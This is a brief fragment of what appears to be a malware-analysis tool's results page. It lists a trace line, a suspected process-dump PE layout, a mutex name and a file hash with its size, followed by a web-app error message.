System.Threading.Thread::Join() ret <null>
Artefacts
Name
 Value
PE Layout

MemoryMapped (process dump suspected)
Mutex

WOQXTs7oWtD8M8qYrlLmR7eEI46g3f+d+hCtgdBqDUXJOzba2H9wuYjhwBC+sbWO
PE Layout

MemoryMapped (process dump suspected)
Mutex

WOQXTs7oWtD8M8qYrlLmR7eEI46g3f+d+hCtgdBqDUXJOzba2H9wuYjhwBC+sbWO
372ac16c1b093925f1fd5dcf0cd8e65a (106.51 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙